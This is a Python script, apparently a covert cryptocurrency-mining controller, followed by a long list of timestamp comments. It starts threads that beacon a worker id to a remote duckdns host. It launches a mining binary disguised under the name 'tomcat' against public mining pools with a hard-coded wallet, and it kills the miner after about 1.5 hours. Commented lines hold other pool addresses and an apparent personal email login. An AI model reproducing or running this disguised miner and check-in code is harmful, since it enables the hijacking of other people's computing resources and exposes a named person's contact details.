import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:08.814330
#2018-02-17 16:28:07.284245
#2018-02-17 18:16:03.481808
#2018-02-17 20:03:07.086115
#2018-02-17 21:51:07.479187
#2018-02-17 23:36:06.203193
#2018-02-18 01:25:01.483529
#2018-02-18 03:12:01.865290
#2018-02-18 04:59:04.802463
#2018-02-18 06:49:06.912797
#2018-02-18 08:38:05.933055
#2018-02-18 10:24:04.824543
#2018-02-18 12:10:07.757013
#2018-02-18 13:56:05.912531
#2018-02-18 15:46:05.902586
#2018-02-18 17:36:05.664596
#2018-02-18 19:24:07.344055
#2018-02-18 21:09:04.720849
#2018-02-18 22:56:04.482002
#2018-02-19 00:44:05.588701
#2018-02-19 02:31:07.197809
#2018-02-19 04:17:01.283475
#2018-02-19 06:02:05.362149
#2018-02-19 07:49:06.484821
#2018-02-19 09:39:07.886122
#2018-02-19 11:29:07.085525
#2018-02-19 13:17:08.748163
#2018-02-19 15:04:07.345439
#2018-02-19 16:51:04.854872
#2018-02-19 18:37:05.542016
#2018-02-19 20:24:04.809934
#2018-02-19 22:12:09.174094
#2018-02-19 23:57:07.575437
#2018-02-20 01:45:08.142050
#2018-02-20 03:31:07.635656
#2018-02-20 05:18:03.693971
#2018-02-20 07:01:01.537249
#2018-02-20 08:47:05.650799
#2018-02-20 10:31:01.828231
#2018-02-20 12:15:09.639414
#2018-02-20 14:02:09.543847
#2018-02-20 15:47:01.782437
#2018-02-20 17:33:09.422069
#2018-02-20 19:20:02.830689
#2018-02-20 21:08:08.369244
#2018-02-20 22:53:06.582951
#2018-02-21 00:35:04.656096
#2018-02-21 02:21:02.134003
#2018-02-21 04:07:01.438894
#2018-02-21 05:53:07.478318
#2018-02-21 07:41:01.679985
#2018-02-21 09:25:10.378569
#2018-02-21 11:15:05.199528
#2018-02-21 13:02:07.812112
#2018-02-21 14:51:09.145783
#2018-02-21 16:39:06.688426
#2018-02-21 18:28:08.469968
#2018-02-21 20:14:01.430730
#2018-02-21 22:02:02.147215
#2018-02-21 23:49:02.105530
#2018-02-22 01:38:06.936655
#2018-02-22 03:25:08.110443
#2018-02-22 05:12:05.677650
#2018-02-22 06:56:01.367582
#2018-02-22 08:43:05.627690
#2018-02-22 10:31:07.483036
#2018-02-22 12:17:01.474769
#2018-02-22 14:01:10.368311
#2018-02-22 15:50:09.580200
#2018-02-22 17:37:08.743610
#2018-02-22 19:23:06.873647
#2018-02-22 21:15:09.454812
#2018-02-22 23:01:07.196241
#2018-02-23 00:47:08.082328
#2018-02-23 02:35:05.603402
#2018-02-23 04:22:07.324468
#2018-02-23 06:09:02.224428
#2018-02-23 07:54:01.452342
#2018-02-23 10:13:07.226973
#2018-02-23 12:01:01.639270
#2018-02-23 13:49:07.059302
#2018-02-23 15:41:04.192443
#2018-02-23 17:28:01.781917
#2018-02-23 19:13:05.333047
#2018-02-23 20:59:05.965475
#2018-02-23 22:55:08.329009
#2018-02-24 00:42:08.778991
#2018-02-24 02:33:04.500851
#2018-02-24 04:26:06.785176
#2018-02-24 06:11:06.949700
#2018-02-24 07:59:01.692818
#2018-02-24 09:43:01.584714
#2018-02-24 11:38:07.863518
#2018-02-24 13:28:04.488949
#2018-02-24 15:17:04.210886
#2018-02-24 17:06:05.612105
#2018-02-24 18:57:07.110634
#2018-02-24 20:44:05.283908
#2018-02-24 22:59:01.909391
#2018-02-25 02:16:07.053046
#2018-02-25 05:51:07.281093
#2018-02-25 11:37:04.407769